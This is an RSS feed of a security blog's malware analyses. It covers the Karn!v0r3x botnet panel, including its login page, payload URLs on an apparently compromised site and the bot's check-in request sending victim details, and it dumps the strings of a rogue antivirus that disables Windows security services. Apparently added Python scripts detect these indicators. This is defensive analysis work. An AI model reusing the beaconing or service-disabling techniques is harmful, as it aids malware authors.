<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; Malware Analysis</title>
	<atom:link href="http://blog.novirusthanks.org/category/malware-analysis/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Karn!v0r3x v1.0 Exploit Kit</title>
		<link>http://blog.novirusthanks.org/2012/01/karnv0r3x-v1-0-exploit-kit/</link>
		<comments>http://blog.novirusthanks.org/2012/01/karnv0r3x-v1-0-exploit-kit/#comments</comments>
		<pubDate>Sat, 07 Jan 2012 21:49:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploit kit]]></category>
		<category><![CDATA[Karn!v0r3x]]></category>
		<category><![CDATA[Malandrines]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3061</guid>
		<description><![CDATA[There is a new exploit kit in the wild, this time named Karn!v0r3x v1.0: Html code of the login page: &#60;html&#62; &#60;head&#62; &#60;title&#62;Karn!v0r3x v1.0 [Inicio]&#124; Malandrines .n3t&#60;/title&#62; &#60;script language=&#34;JavaScript&#34; src=&#34;files/fallt.js&#34;&#62;&#60;/script&#62; &#60;style&#62; body{background:black;color:yellow;} #karnivora{ margin:80px auto; background:url('files/karni.jpg'); width:500px; height:375px; border:1px solid red; -moz-border-radius:5px; border-radius:5px; color:black;font-size:20px;font-weight:bold; } form{float:right;} ol{list-style:none;margin:0px;padding:0px;} input{background:#2F2F2F;color:yellow;} &#160; &#60;/style&#62; &#60;/head&#62; &#60;body&#62; &#60;div id='karnivora'&#62; &#60;form [...]]]></description>
			<content:encoded><![CDATA[<p>There is a new exploit kit in the wild, this time named <b>Karn!v0r3x v1.0</b>:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/Karnv0r3x-v1.0-Inicio-Malandrines.n3t_1325855141161.png" alt="Image" title="Karn!v0r3x v1.0 [Inicio]- Malandrines(dot)n3t" /></p>
<p>HTML code of the login page:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Karn!v0r3x v1.0 [Inicio]| Malandrines .n3t&lt;/title&gt;
&lt;script language=&quot;JavaScript&quot; src=&quot;files/fallt.js&quot;&gt;&lt;/script&gt;
&lt;style&gt;
body{background:black;color:yellow;}
#karnivora{
	margin:80px auto;
	background:url('files/karni.jpg');
	width:500px;
	height:375px;
	border:1px solid red;
	-moz-border-radius:5px;
	border-radius:5px;
	color:black;font-size:20px;font-weight:bold;
}
form{float:right;}
ol{list-style:none;margin:0px;padding:0px;}
input{background:#2F2F2F;color:yellow;}
&nbsp;
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;div id='karnivora'&gt;
		&lt;form action='' method='post'&gt;
		&lt;ol&gt;
			&lt;li&gt;
&nbsp;
				&lt;label&gt;Username:&lt;/label&gt;&lt;br/&gt; 
				&lt;input type='text' name='user' size='20' /&gt;
			&lt;/li&gt;
			&lt;li&gt;
				&lt;label&gt;Password:&lt;/label&gt; &lt;br/&gt;
				&lt;input type='password' name='pass' size='20' /&gt;
			&lt;/li&gt;
				&lt;li&gt;&lt;input type='submit' value='Enter'/&gt;&lt;/li&gt;
&nbsp;
		&lt;/ol&gt;
		&lt;/form&gt;
&nbsp;
		&lt;div style='margin-top:354px;margin-left:10px;'&gt;
			Karn!v0r3x v1.0 | Malandrines .n3t [2011]
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/body&gt;</pre></div></div>

<p>Traffic sniffed while attempting some logins (the form posts the <b>user</b> and <b>pass</b> fields to the panel directory itself):</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">POST /imagenes_noticias/ HTTP/1.1
Host: alertas .gob.mx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: hxxp://www.alertas .gob.mx/imagenes_noticias/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
&nbsp;
user=username&amp;pass=password</pre></div></div>

<p>Screenshots of the content of some directories:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">hxxp://www.alertas .gob.mx/imagenes_noticias/files/</pre></div></div>

<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/Index-of-imagenes_noticias-files_1325855201421.png" alt="Image" title="Directory content" /></p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">hxxp://www.alertas .gob.mx/imagenes_noticias/files/os/</pre></div></div>

<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/07_01_2012-22_01_35.jpeg" alt="Image" title="Directory content" /></p>
<p>The file <b>net4.exe</b> appears to be the legitimate <a href="http://www.tucows.com/download.html?software_id=826697&#038;t=2" title="Tucows.com - Microsoft .NET Framework 4">.NET Framework 4.0</a> installer:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">File: net4_exe
Size: 889416 bytes
MD5 Hash: 53406E9988306CBD4537677C5336ABA4
SHA1 Hash: 06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
SHA256 Hash: FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
SHA384 Hash: FAA596D827BB04DAD53CFB921047BA07916BA78754EBDF00A5DF1BEE69594512DDD9E5F6F1C76D6B82EE3576E4CDA40F
SHA512 Hash: 4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99</pre></div></div>

<p>The executable is hosted at:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">hxxp://www.alertas .gob.mx/imagenes_noticias/files/net4.exe</pre></div></div>

<p>If we query the <b>bot.php</b> file as follows:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">hxxp://www.alertas .gob.mx/imagenes_noticias/bot.php?b=sites</pre></div></div>

<p>We get what looks like a list of website titles, as seen in this image:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/01/06_01_2012-14_12_03.jpeg" alt="Image" /></p>
<p>Most probably the banking trojan distributed with this kit monitors the window titles of web browsers, and when a title matches an entry in this list it starts capturing the banking session to steal the account details.</p>
<p>List of known paths related to this exploit kit:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/index.php
/bot.php?b=sites
/bot.php?b=save
/bot.php?b=show
/bot.php?b=id
/bot.php?b=savesites
/files/
/files/os/
/files/capturas/
/files/downloads/
/files/geoip.dat
/files/geoip.inc
/files/karni.jpg
/files/paises/
/files/net4.exe</pre></div></div>

<p>Despite the kit's name, what is visible here is a botnet control panel: an infected machine checks in with the C&#038;C server with a request like this, sending the OS version, computer name and username in the query string:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/bot.php?b=save&amp;windows=Microsoft%20Windows%20NT%205.1.2600%20Service%20Pack%203&amp;pcname=PCNAME&amp;userna=UserName</pre></div></div>
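<p>As an added example (not code from the original post), the following Python script flags this panel's traffic in a web-proxy log. It seeds on the distinctive <b>bot.php?b=&lt;action&gt;</b> requests, then flags other requests to the same panel directory that hit the known paths listed above, and parses the check-in parameters (<b>windows</b>, <b>pcname</b>, <b>userna</b>) into a victim record. The log lines are constructed for the demo, the host www.example-panel.invalid and the client addresses are placeholders, and the Squid-style log layout is an assumption; only the paths, the action names and the parameter names come from the traffic shown in this post.</p>

```python
"""Flag Karn!v0r3x panel traffic in a web-proxy log (added example).

Log layout is a constructed Squid-style "timestamp client method url";
the host www.example-panel.invalid and the client IPs are placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Paths the post lists for this panel, relative to the directory it lives in.
KNOWN_PATHS = {
    "/index.php", "/files/", "/files/os/", "/files/capturas/",
    "/files/downloads/", "/files/geoip.dat", "/files/geoip.inc",
    "/files/karni.jpg", "/files/paises/", "/files/net4.exe",
}
BOT_ACTIONS = {"sites", "save", "show", "id", "savesites"}
# Query parameters the infected host sends in its b=save check-in.
CHECKIN_PARAMS = ("windows", "pcname", "userna")

LINE_RE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
1325855141 10.0.0.7 GET http://www.example-panel.invalid/imagenes_noticias/bot.php?b=save&windows=Microsoft%20Windows%20NT%205.1.2600%20Service%20Pack%203&pcname=PCNAME&userna=UserName
1325855150 10.0.0.7 GET http://www.example-panel.invalid/imagenes_noticias/bot.php?b=sites
1325855160 10.0.0.9 GET http://www.example.invalid/news/index.php
1325855170 10.0.0.7 GET http://www.example-panel.invalid/imagenes_noticias/files/net4.exe
1325855180 10.0.0.11 POST http://www.example-panel.invalid/imagenes_noticias/
"""


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["url"])
    rec["host"] = url.netloc.lower()
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def find_panel_roots(records):
    """Seed on bot.php?b=<known action>: that pair is specific enough to
    identify the (host, directory) the panel is installed under."""
    roots = set()
    for r in records:
        if r["path"].endswith("/bot.php") and r["query"].get("b") in BOT_ACTIONS:
            roots.add((r["host"], r["path"][: -len("bot.php")]))
    return roots


def scan(log_text):
    """Return one finding per request that touches a seeded panel directory."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    roots = find_panel_roots(records)
    findings = []
    for r in records:
        for host, root in roots:
            if r["host"] != host or not r["path"].startswith(root):
                continue
            tail = "/" + r["path"][len(root):]
            if tail == "/bot.php":
                action = r["query"].get("b")
                if action == "save" and all(p in r["query"] for p in CHECKIN_PARAMS):
                    # Victim inventory: the bot reports OS, hostname and user.
                    findings.append({"client": r["client"], "kind": "checkin",
                                     "os": r["query"]["windows"],
                                     "pcname": r["query"]["pcname"],
                                     "user": r["query"]["userna"]})
                else:
                    findings.append({"client": r["client"], "kind": "bot_" + str(action)})
            elif tail in KNOWN_PATHS:
                # Payload/config fetches: /files/net4.exe, geoip data, etc.
                findings.append({"client": r["client"], "kind": "panel_path", "path": tail})
            elif tail == "/" and r["method"] == "POST":
                # The login form posts user/pass to the panel directory itself.
                findings.append({"client": r["client"], "kind": "panel_login"})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

<p>Seeding on <b>bot.php</b> plus a known action and only then matching the generic paths (such as <b>/index.php</b>) under that directory keeps the rule from firing on every site that happens to have a <b>files/</b> folder; the check-in record gives the responder the victim hostname and user straight from the proxy log.</p>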

<p>More details about this exploit kit can be found here:<br />
<a href="http://laboratoriomalware.blogspot.com/2012/01/nuevo-botnet-contra-mexico-karnv0r3x.html">Nuevo Botnet Contra Mexico: Karn!v0r3x </a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/01/karnv0r3x-v1-0-exploit-kit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FakeAV: AntiVirus Studio 2010</title>
		<link>http://blog.novirusthanks.org/2010/10/fakeav-antivirus-studio-2010/</link>
		<comments>http://blog.novirusthanks.org/2010/10/fakeav-antivirus-studio-2010/#comments</comments>
		<pubDate>Mon, 04 Oct 2010 16:52:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Rogue Software]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2930</guid>
		<description><![CDATA[Another FakeAV, this time called AntiVirus Studio 2010. Like all FakeAVs, it claims to have found a lot of infections on your computer, and the only way to clean them is to pay a hefty price for a &#8220;license key&#8221;. Here we have the main interface. As usual it starts the scan without any user interaction [...]]]></description>
			<content:encoded><![CDATA[<p>Another FakeAV, this time called AntiVirus Studio 2010.  Like all FakeAVs, it claims to have found a lot of infections on your computer, and the only way to clean them is to pay a hefty price for a &#8220;license key&#8221;.</p>
<p>Here we have the main interface.  As usual it starts the scan without any user interaction and displays a long list of so-called threats.</p>
<p><a href="http://i55.tinypic.com/2poegxe.png" target="_blank"><img src="http://i55.tinypic.com/2poegxe.png" border="0" alt="AntiVirus Studio 2010 Main" /></a></p>
<p>You are then prompted with a Buy Now window, which again shows the list of &#8220;threats&#8221; on the computer.  That list is hardcoded into the binary and never changes from system to system.</p>
<p><a href="http://i51.tinypic.com/2gv1m9s.png" target="_blank"><img src="http://i51.tinypic.com/2gv1m9s.png" border="0" alt="AntiVirus Studio 2010 Warning" /></a></p>
<p>If you click the Get License Key button the &#8220;Secure transaction browser&#8221; opens.  Of course, this browser is not secure in any way.</p>
<p><a href="http://i54.tinypic.com/34rin7p.png" target="_blank"><img src="http://i54.tinypic.com/34rin7p.png" border="0" alt="AntiVirus Studio 2010 SecureBuy" /></a></p>
<p>I found this quite amusing.  Upon closing the main window you get this message box. (English clearly isn&#8217;t their first language.)</p>
<p><a href="http://i53.tinypic.com/2hzs5eu.png" target="_blank"><img src="http://i53.tinypic.com/2hzs5eu.png" border="0" alt="AntiVirus Studio 2010 OMG...SPAM" /></a></p>
<p>This is a list of strings from the unpacked installer.</p>
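<p>As an added example (not code from the original post), the following Python script parses the strings dump in the "0xOFFSET    0xLENGTH    string" layout shown below and pulls out what a responder wants from it: the hardcoded (program, detection) pairs that feed the "Program %s is infected with virus %s" dialog, the Windows services the installer touches, the Run value it uses for persistence, and its URL templates. It also uses the declared length to flag strings the dump tool truncated. The embedded sample is a hand-picked subset of the dump's own lines; the pairing rule (an .exe string followed by a detection-style name) and the assumption that the Run value name follows the key path are heuristics for this dump, and the service descriptions are facts about Windows, not something the post states.</p>

```python
"""Mine the strings dump of the AntiVirus Studio 2010 installer (added example).

Parses the "0xOFFSET    0xLENGTH    string" layout of the dump and extracts the
fake-threat table plus a few host IOCs. The sample below is a subset of the
dump's own lines; the pairing and adjacency rules are heuristics for this dump.
"""
import re

DUMP_LINE = re.compile(r"^0x([0-9A-Fa-f]{8})\s+0x([0-9A-Fa-f]{8})\s+(.*)$")

# Detection-name shapes seen in the table: "Trojan:Win32/Hiloti.gen!D",
# "W32/Autorun.worm!5492698F", "Keygen-Nero.a", "BackDoor-DKA Internet",
# "Generic Dropper.x".
DETECTION_RE = re.compile(
    r"^(?:[A-Za-z]+:)?[A-Za-z0-9]+/[A-Za-z0-9._!-]+$"
    r"|^[A-Za-z]+-[A-Za-z0-9.]+(?: [A-Za-z]+)?$"
    r"|^Generic [A-Za-z.]+$"
)

# Service names sitting next to SeDebugPrivilege in the dump and the Windows
# component each controls (Windows facts, not taken from the post).
WINDOWS_SERVICES = {
    "wscsvc": "Security Center",
    "SharedAccess": "Windows Firewall / Internet Connection Sharing (XP)",
    "wuauserv": "Automatic Updates",
    "MpsSvc": "Windows Firewall (Vista and later)",
}
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Subset of the dump's lines, embedded so this runs offline.
SAMPLE_DUMP = r"""
0x00075158    0x00000010    SeDebugPrivilege
0x0007516C    0x00000006    wscsvc
0x00075174    0x0000000C    SharedAccess
0x00075184    0x00000008    wuauserv
0x00075190    0x00000006    MpsSvc
0x00076838    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x00076868    0x0000000E    SecurityCenter
0x00075A74    0x00000012    securitycenter.exe
0x00075A88    0x00000019    AntiVirus Studio 2010.exe
0x00075AD4    0x00000007    cmd.exe
0x00075B18    0x00000100    Program %s is infected with virus %s. Continue running this program may be dangerous to your computer and personal data. Running
0x000765E8    0x0000002D    /httpss/setup.php?v=%s&action=%s&mk=%s&aid=%s
0x000785C8    0x0000000D    httpsquer.com
0x00078814    0x00000009    rtfme.exe
0x00078820    0x0000001F    TrojanDownloader:Win32/Renos.KO
0x00078840    0x00000009    17dkf.exe
0x0007884C    0x00000018    Adware:Win32/Wheresphere
0x00078E24    0x0000000A    dgxdro.exe
0x00078E30    0x00000011    Generic Dropper.x
0x00078EAC    0x0000000D    8gmsed-bd.exe
0x00078EBC    0x00000015    BackDoor-DKA Internet
0x00078ED4    0x0000000B    bzqa43d.exe
0x00078EE0    0x00000010    Downloader-BQZ.a
"""


def parse_dump(text):
    """Return (offset, declared_length, string) tuples; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.rstrip())
        if m:
            entries.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return entries


def truncated_strings(entries):
    """The dump tool cut long strings; the declared length exposes that."""
    return [e for e in entries if len(e[2]) < e[1]]


def fake_threat_table(entries):
    """(program, detection) pairs behind 'Program %s is infected with virus %s'."""
    pairs = []
    for (_, _, s), (_, _, nxt) in zip(entries, entries[1:]):
        if s.lower().endswith(".exe") and DETECTION_RE.match(nxt):
            pairs.append((s, nxt))
    return pairs


def host_iocs(entries):
    """Privileges, services, Run values and URL templates worth hunting for."""
    strings = [s for _, _, s in entries]
    iocs = {"privileges": [], "services": [], "run_values": [], "urls": []}
    for i, s in enumerate(strings):
        if s.startswith("Se") and s.endswith("Privilege"):
            iocs["privileges"].append(s)
        if s in WINDOWS_SERVICES:
            iocs["services"].append(s)
        # Heuristic: the value name written under Run follows the key path.
        if s == RUN_KEY and i + 1 < len(strings):
            iocs["run_values"].append(strings[i + 1])
        if re.search(r"\.php(\?|$)", s) or re.fullmatch(r"[a-z0-9-]+\.(com|net|org)", s):
            iocs["urls"].append(s)
    return iocs


if __name__ == "__main__":
    ents = parse_dump(SAMPLE_DUMP)
    print(fake_threat_table(ents))
    print(host_iocs(ents))
    print(truncated_strings(ents))
```

<p>The four service names next to <b>SeDebugPrivilege</b> are the ones a rogue disables so Windows stops warning the user: Security Center, the firewall on XP and on Vista and later, and Automatic Updates. The Run value <b>SecurityCenter</b> and the <b>Software\AntiVirus Studio 2010</b> key are the cleanup points for the persistence this dump reveals.</p>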

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x00073870    0x00000014    Win64.BIT.Looker.exe
0x00073890    0x000000AD    Win64.BIT.Looker software that puts high physical demand on hardware may damage it by excessive wear and tear. This worm can be 
0x00073940    0x00000011    Screen.Grab.J.exe
0x00073960    0x000000AD    Screen.Grab.J is a Trojan program that records keys and license info, stealing personal financial information. This worm can be 
0x00073A10    0x0000000C    Sft.dez.Wien
0x00073A28    0x000000CA    Sft.dez.Wien is a virus attempts to spread itself by attaching to a host program, and can damage hardware, software or data in t
0x00073AF4    0x0000000A    CAlert2Dlg
0x00073B00    0x00000008    SYSCLOSE
0x00073B0C    0x00000006    Tahoma
0x00073B14    0x00000006    Tahoma
0x00073B1C    0x00000006    Tahoma
0x00073B24    0x00000007    Warning
0x00073B2C    0x00000035    Are you sure you want to leave this software working?
0x00073B64    0x00000007    Warning
0x00073B70    0x00000158    Are you wish to keep this software on your computer ? This can lead to private data steal such as passwords, and credit cards by
0x00073F00    0x0000000F    Security Center
0x00073F10    0x00000005    ALERT
0x00073F18    0x00000010    firewall
0x00073F2C    0x0000000C    ignore
0x00073F3C    0x00000022    Keep this remote connection alive?
0x00074108    0x00000008    CBrowser
0x000742B5    0x00000009    s (%s:%d)
0x000742D0    0x0000001E    Exception thrown in destructor
0x000742F0    0x0000004A    C:\Program Files\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
0x0007434C    0x00000008    CEulaDlg
0x00074358    0x00000013    AntiVirus Tech Ltd.
0x0007436C    0x00000014    {CompanyNamePutHere}
0x00074384    0x00000013    AntiVirus Tech Ltd.
0x00074398    0x00000014    {COMPANYNAMEPUTHERE}
0x000743B0    0x00000015    AntiVirus Studio 2010
0x000743C8    0x00000015    {SoftwareNamePutHere}
0x000743E0    0x00000015    AntiVirus Studio 2010
0x000743F8    0x00000015    {SOFTWARENAMEPUTHERE}
0x000745D8    0x00000009    CFakeBSOD
0x000745E8    0x0000004D    -A problem has been detected and Windows has been shut down to prevent damage
0x00074638    0x00000012    -to your computer.
0x00074650    0x0000004A    *The problem seems to have been caused by the following file: SPRMTROY.SYS
0x0007469C    0x00000015    *CRITICAL_VIRUS_ERROR
0x000746B4    0x0000003E    *Your computer will be rebooted. All unsaved data will be lost
0x000746F4    0x0000001F     Possibly stolen security data:
0x00074714    0x00000018     - Possible credit cards
0x00074730    0x0000000C     - Passwords
0x00074740    0x00000011     - Email accounts
0x00074758    0x00000047    *Dll base DataStmp  - Name                    Dll base DataStmp  - Name
0x000747A0    0x0000004E     FAC8A000  FAC8AC09 - Exploit-PDF.w           ACC8A000  ACC8AC09 - NTRootKit-H
0x000747F0    0x00000051     CA78C000  CA78C8D0 - W32/Renocide.c          BA78C000  CAB8C8D0 - W32/Renocide.c
0x00074848    0x0000004F     AC592000  AC592045 - Keygen-Nero.a           ACB92000  AC592A45 - BackDoor-EFQ
0x00074898    0x00000051     7A76A000  7A76A12A - Generic HTool.b         7A76A000  7A76B12A - Downloader-BRW
0x000748F0    0x0000004F     1AC7A000  1AC7AC09 - W32/Rimecud             1AB7A000  1ACBAC09 - RealAlert-EA
0x00074940    0x00000053     6A49C000  6A49C8DA - RealAlert-DZ            6A49C000  6A49C8DA - W32/Autorun.worm
0x00074998    0x00000054     FC552000  FC552045 - W32/Spybot.worm.gen     FCB52000  FCB5B045 - Generic Dropper.x
0x000749F0    0x00000050     CA06A000  CA06A12A - W32/Koobface.worm.gen.h CC06A000  CC06A12A - Keygen-Nero.a
0x00074A44    0x0000003E    *If this is the first time you've seen this Stop error screen,
0x00074A84    0x00000028    -press any key to restart your computer.
0x00074AB0    0x00000017    *Technical Information:
0x00074AC8    0x00000043    **** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
0x00074B10    0x00000049    **** SPRMTROY.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
0x00074B5C    0x0000000B    Courier New
0x00074DD0    0x0000000B    ForceRemove
0x00074DE0    0x00000008    NoRemove
0x00074DF0    0x00000006    Delete
0x00074DFC    0x00000005    AppID
0x00074E04    0x00000005    CLSID
0x00074E0C    0x00000014    Component Categories
0x00074E24    0x00000008    FileType
0x00074E30    0x00000009    Interface
0x00074E3C    0x00000008    Hardware
0x00074E54    0x00000008    SECURITY
0x00074E60    0x00000006    SYSTEM
0x00074E68    0x00000008    Software
0x00074E74    0x00000007    TypeLib
0x00074E7C    0x0000000B    CHtmlDialog
0x00074E88    0x00000030    res://%hs/%hs/index.html
0x00075118    0x00000007    /ea.php
0x00075120    0x00000016    http://%s%s?p=1&amp;aid=%s
0x00075138    0x00000007    /ea.php
0x00075140    0x00000016    http://%s%s?p=6&amp;aid=%s
0x00075158    0x00000010    SeDebugPrivilege
0x0007516C    0x00000006    wscsvc
0x00075174    0x0000000C    SharedAccess
0x00075184    0x00000008    wuauserv
0x00075190    0x00000006    MpsSvc
0x00075198    0x0000000E    ivwqerohlh0fpo
0x000751A8    0x0000001A    bpwjxlswvtvxekrptj32410fpo
0x000751C4    0x0000000F    ivwqtvsgsp|1dqp
0x000751D4    0x00000025    Startup installer [%s], username [%s]
0x000751FC    0x00000005    /AID=
0x00075204    0x00000019    Reading AID from registry
0x00075228    0x00000009    BagNumber
0x00075234    0x00000020    Software\Microsoft\Windows\Shell
0x00075258    0x00000009    BagNumber
0x00075264    0x00000020    Software\Microsoft\Windows\Shell
0x00075288    0x0000000A    AID = [%s]
0x00075294    0x0000000A    /UNINSTALL
0x000752A0    0x0000000C    Auto-install
0x000752B0    0x0000000F    Install success
0x000752C0    0x0000000E    Install failed
0x000752D0    0x00000040    46EE38D925C2E49C79D2314B3380316026A18FFD6B8869420970254B581026FE
0x00075314    0x0000001C    Run install/uninstall thread
0x00075334    0x00000011    Uninstall success
0x00075348    0x00000010    Uninstall failed
0x0007535C    0x0000000E    Fake uninstall
0x0007536C    0x0000000F    Install success
0x0007537C    0x0000000F    Install success
0x0007538C    0x0000000E    Install failed
0x0007539C    0x0000000B    Thread done
0x000753A8    0x00000011    Microsoft Windows
0x000753C0    0x00000055    You should get a license for your antivirus software. Click here to get it instantly.
0x00075418    0x00000011    Microsoft Windows
0x00075430    0x0000017D    Base setup of Microsoft Windows (r) Operating System do not contain antivirus and antispyware software. In order to protect your
0x000756A8    0x00000006    Tahoma
0x000756B0    0x00000015    AntiVirus Studio 2010
0x0007570B    0x0000002D    By installing this software you are agree to 
0x0007573C    0x00000006    Tahoma
0x00075744    0x00000011    license and terms
0x00075758    0x00000015    AntiVirus Studio 2010
0x00075796    0x00000031    Press Yes to exit or No to continue installation.
0x000757C8    0x00000015    AntiVirus Studio 2010
0x000759C8    0x00000008    CMainDlg
0x000759D4    0x0000000C    System Error
0x000759E4    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A08    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A2C    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A50    0x00000020    42FAF9222ABD3D7F564AEDBE0D2924F2
0x00075A74    0x00000012    securitycenter.exe
0x00075A88    0x00000019    AntiVirus Studio 2010.exe
0x00075AA4    0x00000008    ac7d.exe
0x00075AB0    0x00000012    securityhelper.exe
0x00075AC4    0x0000000C    rundll32.exe
0x00075AD4    0x00000007    cmd.exe
0x00075ADC    0x0000000C    explorer.exe
0x00075AEC    0x0000000C    iexplore.exe
0x00075AFC    0x00000009    dwwin.exe
0x00075B08    0x0000000B    dllhost.exe
0x00075B18    0x00000100    Program %s is infected with virus %s. Continue running this program may be dangerous to your computer and personal data. Running
0x00075C1C    0x00000011    Microsoft Windows
0x00075E08    0x00000013    map/set too long
0x00075E29    0x0000001A    nvalid map/set iterator
0x00075E5D    0x0000000A    MessageBox
0x00076200    0x00000012    vector too long
0x00076360    0x0000000C    CProgressDlg
0x00076374    0x00000006    Tahoma
0x00076380    0x00000056    The AntiVirus Studio 2010 uninstallation will be finished in few minutes. Please wait.
0x000763D8    0x00000015    AntiVirus Studio 2010
0x000765E8    0x0000002D    /httpss/setup.php?v=%s&amp;action=%s&amp;mk=%s&amp;aid=%s
0x00076618    0x00000007    http://
0x00076620    0x00000015    AntiVirus Studio 2010
0x00076638    0x00000005    %s\%s
0x00076640    0x00000014    software path = [%s]
0x00076658    0x00000019    AntiVirus Studio 2010.exe
0x00076674    0x00000005    %s\%s
0x0007667C    0x00000013    software exe = [%s]
0x00076690    0x00000012    securityhelper.exe
0x000766A4    0x00000005    %s\%s
0x000766AC    0x00000016    uninstaller exe = [%s]
0x000766C4    0x0000001E    Software\AntiVirus Studio 2010
0x000766E4    0x00000011    reg subkey = [%s]
0x000766F8    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x00076720    0x00000026    {FBD69E67-C708-47be-B49F-33D4200B810D}
0x00076748    0x00000015    AntiVirus Studio 2010
0x00076760    0x00000015    AntiVirus Studio 2010
0x00076778    0x00000005    %s\%s
0x00076780    0x00000015    AntiVirus Studio 2010
0x00076798    0x00000009    %s\%s.lnk
0x000767A4    0x00000015    AntiVirus Studio 2010
0x000767BC    0x00000032    %s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
0x000767F0    0x00000015    AntiVirus Studio 2010
0x00076808    0x00000015    %s\%s License Key.lnk
0x00076820    0x00000015    AntiVirus Studio 2010
0x00076838    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x00076868    0x0000000E    SecurityCenter
0x00076878    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x000768A8    0x00000049    Software\Microsoft\Windows\CurrentVersion\Uninstall\AntiVirus Studio 2010
0x000768F4    0x00000020    2B0FD0C0AB089E52B0DC65596784EC45
0x00076918    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x00076940    0x00000020    52CFF1136AE99C08D55D96DEBBCB08C4
0x00076964    0x00000019    AntiVirus Studio 2010.exe
0x00076980    0x00000012    securitycenter.exe
0x00076994    0x00000008    ac7d.exe
0x000769A0    0x00000013    distrib file = [%s]
0x000769B4    0x00000011    distrib extracted
0x000769C8    0x00000016    [%s] installed to [%s]
0x000769E0    0x00000024    [%s] copied to [%s] with result [%d]
0x00076A08    0x0000001E    http://www.%%s/buy/index/%s/%s
0x00076A28    0x0000000E    buy url = [%s]
0x00076A38    0x00000006    BuyUrl
0x00076A40    0x0000000D    &quot;%s&quot; /STARTUP
0x00076A50    0x00000015    AntiVirus Studio 2010
0x00076A68    0x0000002D    Software\Microsoft\Windows\CurrentVersion\Run
0x00076A98    0x00000005    ADVid
